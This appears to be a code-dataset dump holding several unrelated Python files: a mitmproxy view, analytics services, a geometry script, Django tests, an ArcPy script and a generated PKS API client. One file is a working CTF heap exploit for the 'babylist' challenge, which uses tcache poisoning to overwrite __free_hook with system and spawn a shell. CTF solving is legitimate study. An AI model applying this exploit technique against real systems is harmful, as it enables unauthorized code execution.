hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0dc75b65a9507820b7a1135f0816c7e8f573fa2d | 654 | py | Python | mitmproxy/contentviews/auto.py | KarlParkinson/mitmproxy | fd5caf40c75ca73c4b767170497abf6a5bf016a0 | [
"MIT"
] | 24,939 | 2015-01-01T17:13:21.000Z | 2022-03-31T17:50:04.000Z | mitmproxy/contentviews/auto.py | PeterDaveHello/mitmproxy | 4bd7b6c4eadeaca712f63e0e73f20bcf6aadbffb | [
"MIT"
] | 3,655 | 2015-01-02T12:31:43.000Z | 2022-03-31T20:24:57.000Z | mitmproxy/contentviews/auto.py | PeterDaveHello/mitmproxy | 4bd7b6c4eadeaca712f63e0e73f20bcf6aadbffb | [
"MIT"
] | 3,712 | 2015-01-06T06:47:06.000Z | 2022-03-31T10:33:27.000Z | from mitmproxy import contentviews
from . import base
class ViewAuto(base.View):
    """Meta content view that delegates rendering to the best-ranked view."""

    name = "Auto"

    def __call__(self, data, **metadata):
        # TODO: With render_priority implemented by every view this meta
        # view has little justification, but it is kept for now so fewer
        # parts of the codebase need touching.
        ranked = ((v.render_priority(data, **metadata), v) for v in contentviews.views)
        best_priority, best_view = max(ranked)
        if not data and best_priority == 0:
            return "No content", []
        return best_view(data, **metadata)

    def render_priority(self, data: bytes, **metadata) -> float:
        # Negative priority so auto-selection never picks (recurses into) itself.
        return -1
| 31.142857 | 96 | 0.616208 | 597 | 0.912844 | 0 | 0 | 0 | 0 | 0 | 0 | 178 | 0.272171 |
0dc892c0ef85acbf71fdb47d9850dae8da0e6d7a | 10,355 | py | Python | code/services/synergy_services.py | EdsonECM17/DS_Proyecto_02_Synergy_Logistics | a6c347f99e69b926d337db82653dd16850668f4b | [
"MIT"
] | null | null | null | code/services/synergy_services.py | EdsonECM17/DS_Proyecto_02_Synergy_Logistics | a6c347f99e69b926d337db82653dd16850668f4b | [
"MIT"
] | null | null | null | code/services/synergy_services.py | EdsonECM17/DS_Proyecto_02_Synergy_Logistics | a6c347f99e69b926d337db82653dd16850668f4b | [
"MIT"
] | null | null | null | from typing import List
from typing import Optional

from processing.sl_filters import SynergyLogisticsFilters
class Service(SynergyLogisticsFilters):
    """Analysis services over the Synergy Logistics routes table.

    Each method narrows the table through ``filter_routes_df`` (inherited
    from :class:`SynergyLogisticsFilters`) and then either counts the
    matching rows or sums their ``total_value`` column.
    """

    def get_routes_list(self, direction: Optional[str] = None) -> List:
        """List every distinct route present in the table.

        Args:
            direction (Optional[str]): Transaction direction filter.
                Defaults to None (no filtering).

        Returns:
            List: Routes formatted as "origin-destination", first-seen order.
        """
        routes_list = []
        filtered_table = self.filter_routes_df(direction=direction)
        # Keep only the first occurrence of each origin-destination pair.
        for _, row in filtered_table.iterrows():
            route = row['origin'] + "-" + row['destination']
            if route not in routes_list:
                routes_list.append(route)
        return routes_list

    def get_total_elements(self, direction: Optional[str] = None,
                           year: Optional[int] = None,
                           transport_mode: Optional[str] = None) -> int:
        """Count the transactions matching the given filters.

        Args:
            direction (Optional[str]): Transaction direction. Defaults to None.
            year (Optional[int]): Transaction year. Defaults to None.
            transport_mode (Optional[str]): Transport mode. Defaults to None.

        Returns:
            int: Number of rows in the filtered table.
        """
        filtered_table = self.filter_routes_df(direction=direction, start_year=year,
                                               end_year=year, transport_mode=transport_mode)
        return len(filtered_table)

    def get_route_frecuency(self, route: str, direction: Optional[str] = None,
                            year: Optional[int] = None) -> int:
        """Count how many times a route appears in the filtered table.

        Args:
            route (str): Route formatted as "origin-destination".
            direction (Optional[str]): Transaction direction. Defaults to None.
            year (Optional[int]): Transaction year. Defaults to None.

        Returns:
            int: Number of occurrences of the route.
        """
        origin, destination = route.split("-")
        filtered_table = self.filter_routes_df(origin=origin, destination=destination,
                                               direction=direction,
                                               start_year=year, end_year=year)
        return len(filtered_table)

    def get_total_value(self, direction: Optional[str] = None,
                        year: Optional[int] = None,
                        transport_mode: Optional[str] = None) -> int:
        """Sum ``total_value`` over all transactions matching the filters.

        Args:
            direction (Optional[str]): Transaction direction. Defaults to None.
            year (Optional[int]): Transaction year. Defaults to None.
            transport_mode (Optional[str]): Transport mode. Defaults to None.

        Returns:
            int: Sum of the ``total_value`` column of the filtered table.
        """
        filtered_table = self.filter_routes_df(direction=direction, start_year=year,
                                               end_year=year, transport_mode=transport_mode)
        return filtered_table["total_value"].sum()

    def get_route_value(self, route: str, direction: Optional[str] = None,
                        year: Optional[int] = None) -> int:
        """Sum ``total_value`` for one specific route.

        Args:
            route (str): Route formatted as "origin-destination".
            direction (Optional[str]): Transaction direction. Defaults to None.
            year (Optional[int]): Transaction year. Defaults to None.

        Returns:
            int: Sum of ``total_value`` for the route in the filtered table.
        """
        origin, destination = route.split("-")
        filtered_table = self.filter_routes_df(origin=origin, destination=destination,
                                               direction=direction,
                                               start_year=year, end_year=year)
        return filtered_table["total_value"].sum()

    def get_top_ten(self, all_cases: dict) -> dict:
        """Pick the 10 entries with the highest values.

        Args:
            all_cases (dict): Mapping of case -> numeric result.

        Returns:
            dict: Up to 10 entries, ordered by value descending.
        """
        top_keys = sorted(all_cases, key=all_cases.get, reverse=True)[:10]
        return {case: all_cases[case] for case in top_keys}

    def get_transport_frecuency(self, transport: str, direction: Optional[str] = None,
                                year: Optional[int] = None) -> int:
        """Count transactions using a given transport mode.

        Args:
            transport (str): Transport mode.
            direction (Optional[str]): Transaction direction. Defaults to None.
            year (Optional[int]): Transaction year. Defaults to None.

        Returns:
            int: Number of occurrences of the transport mode.
        """
        filtered_table = self.filter_routes_df(transport_mode=transport, direction=direction,
                                               start_year=year, end_year=year)
        return len(filtered_table)

    def get_transport_value(self, transport: str, direction: Optional[str] = None,
                            year: Optional[int] = None) -> int:
        """Sum ``total_value`` for a given transport mode.

        Args:
            transport (str): Transport mode.
            direction (Optional[str]): Transaction direction. Defaults to None.
            year (Optional[int]): Transaction year. Defaults to None.

        Returns:
            int: Sum of ``total_value`` for the transport mode.
        """
        filtered_table = self.filter_routes_df(transport_mode=transport, direction=direction,
                                               start_year=year, end_year=year)
        return filtered_table["total_value"].sum()

    def get_country_frecuency(self, origin: Optional[str] = None,
                              destination: Optional[str] = None,
                              direction: Optional[str] = None,
                              year: Optional[int] = None) -> int:
        """Count transactions involving a country as origin and/or destination.

        Args:
            origin (Optional[str]): Origin country. Defaults to None.
            destination (Optional[str]): Destination country. Defaults to None.
            direction (Optional[str]): Transaction direction. Defaults to None.
            year (Optional[int]): Transaction year. Defaults to None.

        Returns:
            int: Number of matching rows in the filtered table.
        """
        filtered_table = self.filter_routes_df(origin=origin, destination=destination,
                                               direction=direction,
                                               start_year=year, end_year=year)
        return len(filtered_table)

    def get_country_value(self, origin: Optional[str] = None,
                          destination: Optional[str] = None,
                          direction: Optional[str] = None,
                          year: Optional[int] = None) -> int:
        """Sum ``total_value`` for a country as origin and/or destination.

        Args:
            origin (Optional[str]): Origin country. Defaults to None.
            destination (Optional[str]): Destination country. Defaults to None.
            direction (Optional[str]): Transaction direction. Defaults to None.
            year (Optional[int]): Transaction year. Defaults to None.

        Returns:
            int: Sum of ``total_value`` of the matching rows.
        """
        filtered_table = self.filter_routes_df(origin=origin, destination=destination,
                                               direction=direction,
                                               start_year=year, end_year=year)
        return filtered_table["total_value"].sum()

    def reorder_dict_max(self, data_dict: dict) -> dict:
        """Order a dict by value (descending), dropping zero-valued entries.

        Args:
            data_dict (dict): Unordered mapping of key -> numeric value.

        Returns:
            dict: Same data, highest values first, zero values removed.
        """
        return {key: data_dict[key]
                for key in sorted(data_dict, key=data_dict.get, reverse=True)
                if data_dict[key] != 0}
| 45.416667 | 156 | 0.630324 | 10,313 | 0.991825 | 0 | 0 | 0 | 0 | 0 | 0 | 5,861 | 0.563666 |
0dc9078dabe0f46493d9055058389898b1c4669b | 467 | py | Python | src/bspline-insert.py | kaykayehnn/geometric_design | 206977275abb2bc195665175b504dca13e4792bd | [
"MIT"
] | 2 | 2022-03-17T13:35:13.000Z | 2022-03-27T07:45:12.000Z | src/bspline-insert.py | kaykayehnn/geometric_design | 206977275abb2bc195665175b504dca13e4792bd | [
"MIT"
] | null | null | null | src/bspline-insert.py | kaykayehnn/geometric_design | 206977275abb2bc195665175b504dca13e4792bd | [
"MIT"
] | null | null | null | from sympy import init_printing, Rational
from classes.BSpline import BSpline

# Enable pretty-printing of sympy expressions in console output.
init_printing()

# INPUT DATA HERE
# Knot vector of the B-spline; first and last knots are repeated three
# times, i.e. the spline is clamped at both ends.
knots = [
    0,
    0,
    0,
    Rational(2, 5),
    Rational(1, 2),
    Rational(3, 5),
    1,
    1,
    1,
]
# fmt: off
# Control polygon of the curve as [x, y] pairs.
control_points = [
    [2,2],
    [0,2],
    [0,0],
    [-2,0],
    [0,-2],
    [2,-2],
]
# fmt:on
# Parameter values to insert; the repeated 7/10 requests a multiplicity-2
# knot insertion at that parameter.
points_to_insert = [
    Rational(7, 10),
    Rational(7, 10),
]

bspline = BSpline(knots)
bspline.insert(control_points, points_to_insert)
| 12.972222 | 48 | 0.5803 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 35 | 0.074946 |
0dca40621184466cd9ce1c9762d5d83692b16fb4 | 2,765 | py | Python | app/recipe/tests/test_tag_apis.py | NhatHox23/nhat-recipe-backend | 9a6bb84f43ceea94671b9a5a6318f7df648d597f | [
"MIT"
] | null | null | null | app/recipe/tests/test_tag_apis.py | NhatHox23/nhat-recipe-backend | 9a6bb84f43ceea94671b9a5a6318f7df648d597f | [
"MIT"
] | null | null | null | app/recipe/tests/test_tag_apis.py | NhatHox23/nhat-recipe-backend | 9a6bb84f43ceea94671b9a5a6318f7df648d597f | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from recipe.models import Tag
from recipe.serializers import TagSerializer
from core.tests.utils import sample_tag, sample_user
# Resolve the tag endpoint URLs once so every test case reuses them.
TAG_LIST_URL = reverse('recipe:list-tag')
TAG_CREATE_URL = reverse('recipe:create-tag')
class PublicTagListAPI(TestCase):
    """Tests for the tag endpoints without authentication."""

    def setUp(self):
        # A sample user/tag exist in the DB, but the client is deliberately
        # left unauthenticated.
        self.user = sample_user()
        self.tag = sample_tag(user=self.user)
        self.client = APIClient()
        self.payload = {
            "user": self.user.id,
            "name": "Unit Test Tag"
        }

    def test_list_tag_unauthenticated(self):
        """Listing tags without log-in must return 401."""
        res = self.client.get(TAG_LIST_URL)
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_create_tag_unauthenticated(self):
        """Creating a tag without log-in must return 401."""
        res = self.client.post(TAG_CREATE_URL, self.payload, format="json")
        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagListApiTest(TestCase):
    """Tests for the tag endpoints with an authenticated client."""

    def setUp(self):
        # Authenticate the client as the sample user before each test.
        self.user = sample_user()
        self.tag = sample_tag(user=self.user)
        self.client = APIClient()
        self.client.force_authenticate(self.user)
        self.payload = {
            "user": self.user.id,
            "name": "Unit Test Tag"
        }

    def test_list_tag_authenticated(self):
        """Listing tags while logged in returns the serialized tag queryset."""
        res = self.client.get(TAG_LIST_URL)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        tags = TagSerializer(Tag.objects.all(), many=True)
        self.assertEqual(res.data, tags.data)

    def test_tags_limited_to_user(self):
        """Test that tags returned are for the authenticated user"""
        user2 = sample_user(email="test2@nhat.com")
        sample_tag(user=user2, name="test tag 2")
        res = self.client.get(TAG_LIST_URL)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        # Only the tag owned by self.user should come back.
        self.assertEqual(len(res.data), 1)
        self.assertEqual(res.data[0]["name"], self.tag.name)

    def test_create_tag_authenticated(self):
        """Creating a tag while logged in persists it and returns 201."""
        res = self.client.post(TAG_CREATE_URL, self.payload, format="json")
        self.assertEqual(res.status_code, status.HTTP_201_CREATED)
        created_tag = Tag.objects.get(**self.payload)
        self.assertEqual(res.data["name"], created_tag.name)

    def test_create_tag_invalid_payload(self):
        """An empty payload must be rejected with 400."""
        invalid_payload = {}
        res = self.client.post(TAG_CREATE_URL, invalid_payload, format="json")
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
| 35.448718 | 78 | 0.679928 | 2,351 | 0.850271 | 0 | 0 | 0 | 0 | 0 | 0 | 353 | 0.127667 |
0dcacc77536f475e69d67672d4386a6d8109dc9e | 1,029 | py | Python | tests/test_toolkit.py | eng-tools/sfsidb | 5260d64e5ab78db7bab209ac4b34617ebafe9762 | [
"MIT"
] | 1 | 2020-07-03T09:33:49.000Z | 2020-07-03T09:33:49.000Z | tests/test_toolkit.py | eng-tools/sfsidb | 5260d64e5ab78db7bab209ac4b34617ebafe9762 | [
"MIT"
] | 1 | 2020-07-03T09:40:16.000Z | 2020-07-06T01:23:40.000Z | tests/test_toolkit.py | eng-tools/sfsidb | 5260d64e5ab78db7bab209ac4b34617ebafe9762 | [
"MIT"
] | null | null | null | from sfsidb import load as sload
from sfsidb import toolkit
from sfsidb import checking_tools as ct
from sfsidb import sensor_file_reader as sfr
from tests.conftest import TEST_DATA_DIR
def test_get_depth_from_sensor_code():
    """Sensor numbers resolve to codes, and codes map to depths."""
    sensor_ffp = TEST_DATA_DIR + "test-sensor-file.json"
    si = sfr.read_json_sensor_file(sensor_ffp)
    mtype = "ACC"
    sensor_number = 2
    code = sload.get_sensor_code_by_number(si, mtype, sensor_number)
    assert code == "ACCX-NFF-S-M"
    print(code)  # NOTE(review): debug leftover; harmless under pytest
    depth = toolkit.get_depth_by_code(si, code)
    assert depth == 0.0
    code = "ACCX-UB2-L2C-M"  # number = 4
    depth = toolkit.get_depth_by_code(si, code)
    assert ct.isclose(depth, 63.6)
def test_old_style_sensor_code_file():
    """Depth lookup also works for the legacy sensor-file format."""
    sensor_ffp = TEST_DATA_DIR + "test-old-sensor-file.json"
    si = sfr.read_json_sensor_file(sensor_ffp)
    sensor_code = "ACCX-NFF-L2C-M"
    depth = toolkit.get_depth_by_code(si, sensor_code)
    assert ct.isclose(depth, 63.6)
if __name__ == '__main__':
test_old_style_sensor_code_file() | 30.264706 | 68 | 0.730807 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 123 | 0.119534 |
0dcbb2c8e1a6f536fd7f94e8770c33962e2f268b | 1,699 | py | Python | nhoods/setup.py | MSLADevServGIS/NhoodProfiles | aa35d2a4d4be177dc8df79a34915eefb31a20634 | [
"MIT"
] | null | null | null | nhoods/setup.py | MSLADevServGIS/NhoodProfiles | aa35d2a4d4be177dc8df79a34915eefb31a20634 | [
"MIT"
] | null | null | null | nhoods/setup.py | MSLADevServGIS/NhoodProfiles | aa35d2a4d4be177dc8df79a34915eefb31a20634 | [
"MIT"
] | null | null | null | # Setup procedures -- WIP
import os
import re

import arcpy

# Keep all intermediate feature classes in memory.
arcpy.env.workspace = "in_memory"
# TODO: out_gdb = "//cityfiles/DEVServices/WallyG/projects/NhoodProfiles/nhoods/data/NhoodAmenities.gdb/MtStatePlane"

# DATA PROCESSING
# Nhood_buffers: 100-foot buffer around each neighborhood, dissolved by Name.
arcpy.Buffer_analysis("Nhoods", "nhood_buffers",
                      buffer_distance_or_field="100 Feet",
                      line_side="FULL", line_end_type="ROUND",
                      dissolve_option="LIST", dissolve_field="Name",
                      method="PLANAR")

# Parks: copy the Parks feature class from the shared drive into memory.
parks = os.path.join(
    r"\\cityfiles\Shared\PARKS AND RECREATION SHARED\GIS Data",
    r"Parks Data.gdb\Parks")
arcpy.FeatureClassToFeatureClass_conversion(parks, "in_memory", "mem_parks")
# Delete Parks fields that are not needed downstream.
arcpy.DeleteField_management("mem_parks", drop_field="Reference;Rec_Date;Doc_Links;Subtype;Ownership;Origin;Maintenance;Platted_Size;Maint_Level;Status;Assessors_Parcel_No;Acres;Dev_Status;Owner_Type;Maint_Responsibility;Shape_Length;Shape_Area")

# COMMON AREAS: select CAMA parcels whose legal description mentions COMMON.
CAMA = r"W:\DATA\CAMA\Missoula\MissoulaOwnerParcel_shp\MissoulaOwnerParcel_shp.shp"
arcpy.Select_analysis(CAMA, "in_memory/mem_commons", '''"LegalDescr" LIKE
\'%COMMON%\'''')
# make new field "CAName" holding the leading phrase of the legal description
arcpy.AddField_management("mem_commons", "CAName", "TEXT", "", "", 50)
with arcpy.da.UpdateCursor("mem_commons", ["LegalDescr", "CAName"]) as cur:
    for row in cur:
        # First chunk up to a non-word char followed by whitespace, title-cased.
        row[1] = re.split("\W\s", row[0])[0].strip().title()
        cur.updateRow(row)
# Dissolve common areas into single-part features keyed by CAName.
arcpy.Dissolve_management(in_features="mem_commons", out_feature_class="in_memory/mem_commons_Diss", dissolve_field="CAName", statistics_fields="", multi_part="SINGLE_PART", unsplit_lines="DISSOLVE_LINES")

# Merge
0dcc982e8e10f4b504acced8db3b8e7638f722fe | 2,085 | py | Python | Gathered CTF writeups/ptr-yudai-writeups/2019/Facebook_CTF_2019/babylist/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | Gathered CTF writeups/ptr-yudai-writeups/2019/Facebook_CTF_2019/babylist/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | Gathered CTF writeups/ptr-yudai-writeups/2019/Facebook_CTF_2019/babylist/solve.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z | from ptrlib import *
import re
import time
def create(name):
    # Menu option 1: create a new list with the given name.
    sock.recvuntil("> ")
    sock.sendline("1")
    sock.sendline(name)
def add(index, value):
    # Menu option 2: append an integer value to list `index`.
    sock.recvuntil("> ")
    sock.sendline("2")
    sock.sendline(str(index))
    sock.sendline(str(value))
def view(index, pos):
    # Menu option 3: print element `pos` of list `index` and parse the reply.
    sock.recvuntil("> ")
    sock.sendline("3")
    sock.sendline(str(index))
    sock.recvuntil("into list:\n")
    sock.sendline(str(pos))
    line = sock.recvline()
    # Reply has the shape b"name[pos] = value"; capture the three fields.
    r = re.findall(b"(.+)\[(.+)\] = (.+)", line)
    w = int(r[0][2])
    if w < 0:
        # The binary prints signed values; reinterpret as unsigned 32-bit.
        w = (0xffffffff ^ (- w - 1))
    return r[0][0], int(r[0][1]), w
def dup(index, name):
    # Menu option 4: duplicate list `index` into a new list called `name`.
    sock.recvuntil("> ")
    sock.sendline("4")
    sock.sendline(str(index))
    sock.sendline(name)
def remove(index):
    # Menu option 5: delete list `index`.
    sock.recvuntil("> ")
    sock.sendline("5")
    sock.sendline(str(index))
# Target libc and process; remote endpoints kept commented for reference.
libc = ELF("./libc-2.27.so")
sock = Process("./babylist")#Socket("localhost", 4001)
#sock = Socket("challenges3.fbctf.com", 1343)

# libc-2.27 offsets: main_arena+0x60 (where the leaked heap pointer
# presumably points — confirm against this libc build) and an unused
# one_gadget candidate.
main_arena = 0x3ebc40 + 0x60
one_gadget = 0x10a38c

# Grow lists 0/1 by 0x50//4 four-byte entries each.
create("0") # 0
for i in range(0x50 // 4):
    add(0, 0x1111)
dup(0, "1") # 1
for i in range(0x50 // 4):
    add(1, 0x2222)
create("libc leak") # 2
remove(1)
# fill up tcache for 0x21
for i in range(8):
    create(str(i)) # 3-9
remove(1)
for i in range(3, 9):
    remove(i)
remove(2)
# libc leak: combine two 32-bit reads from list 0 into a 64-bit pointer.
addr_main_arena = (view(0, 1)[2] << 32) | view(0, 0)[2]
libc_base = addr_main_arena - main_arena
logger.info("libc base = " + hex(libc_base))

# double free
create("1") # 1
for i in range(8):
    add(1, 0xcafe)
dup(1, "PON") # 2
for i in range(8):
    add(1, i + 4)
    add(2, i + 4)
# TCache Poisoning: aim a future allocation just before __free_hook.
target = libc_base + libc.symbol('__free_hook') - 8
create("evil") # 3
add(3, target & 0xffffffff)
add(3, target >> 32)
for i in range(3):
    add(3, 0xdead)
#addr_one_gadget = libc_base + one_gadget
addr_system = libc_base + libc.symbol("system")
create("dummy") # 4
for i in range(5):
    add(4, 0xbeef)
# This list's buffer lands on __free_hook-8: write "/bin/sh" followed by
# &system, so a later free("/bin/sh") becomes system("/bin/sh").
create("free hook") # 5
add(5, u32("/bin"))
add(5, u32("/sh\x00"))
add(5, addr_system & 0xffffffff)
add(5, addr_system >> 32)
add(5, 0)

sock.interactive()
| 21.27551 | 55 | 0.607674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 406 | 0.194724 |
0dce3b2e494bf63f350d54551978be23a2419c37 | 43,142 | py | Python | container_service_extension/lib/pksclient/api/profile_api.py | arunmk/container-service-extension | 5e67df64fd5ed7fbb664d449356cb983cecbca12 | [
"BSD-3-Clause"
] | 81 | 2017-07-05T19:42:41.000Z | 2022-03-09T22:04:05.000Z | container_service_extension/lib/pksclient/api/profile_api.py | arunmk/container-service-extension | 5e67df64fd5ed7fbb664d449356cb983cecbca12 | [
"BSD-3-Clause"
] | 670 | 2017-07-05T16:48:02.000Z | 2022-03-31T13:40:53.000Z | container_service_extension/lib/pksclient/api/profile_api.py | arunmk/container-service-extension | 5e67df64fd5ed7fbb664d449356cb983cecbca12 | [
"BSD-3-Clause"
] | 64 | 2017-07-05T16:32:55.000Z | 2022-03-23T09:36:03.000Z | # coding: utf-8
"""
PKS
PKS API # noqa: E501
OpenAPI spec version: 1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# python 2 and python 3 compatibility library
import six
from container_service_extension.lib.pksclient.api_client import ApiClient
class ProfileApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
    def __init__(self, api_client=None):
        # Fall back to a default-configured ApiClient when none is supplied.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client
def add_compute_profile(self, body, **kwargs): # noqa: E501
"""Create a new compute profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_compute_profile(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param ComputeProfileRequest body: Compute profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_compute_profile_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_compute_profile_with_http_info(body, **kwargs) # noqa: E501
return data
    def add_compute_profile_with_http_info(self, body, **kwargs):  # noqa: E501
        """Create a new compute profile (detailed variant).

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.add_compute_profile_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param ComputeProfileRequest body: Compute profile info (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted keyword arguments: the declared API params plus the
        # generic request-control options understood by ApiClient.call_api.
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method add_compute_profile" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `add_compute_profile`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth', 'uaa']  # noqa: E501

        return self.api_client.call_api(
            '/compute-profiles', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def add_kubernetes_profile(self, body, **kwargs): # noqa: E501
"""Create a new kubernetes profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_kubernetes_profile(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param KubernetesProfileRequest body: Kubernetes profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_kubernetes_profile_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_kubernetes_profile_with_http_info(body, **kwargs) # noqa: E501
return data
    def add_kubernetes_profile_with_http_info(self, body, **kwargs):  # noqa: E501
        """Create a new kubernetes profile (detailed variant).

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.add_kubernetes_profile_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param KubernetesProfileRequest body: Kubernetes profile info (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted keyword arguments: the declared API params plus the
        # generic request-control options understood by ApiClient.call_api.
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method add_kubernetes_profile" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `add_kubernetes_profile`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['basicAuth', 'uaa']  # noqa: E501

        return self.api_client.call_api(
            '/kubernetes-profiles', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def add_network_profile(self, body, **kwargs): # noqa: E501
"""Create a new network profile # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_network_profile(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param NetworkProfileRequest body: Network profile info (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_network_profile_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_network_profile_with_http_info(body, **kwargs) # noqa: E501
return data
    def add_network_profile_with_http_info(self, body, **kwargs):  # noqa: E501
        """Create a new network profile (detailed variant).

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True

        >>> thread = api.add_network_profile_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param NetworkProfileRequest body: Network profile info (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted keyword arguments: the declared API params plus the
        # generic request-control options understood by ApiClient.call_api.
        all_params = ['body']  # noqa: E501
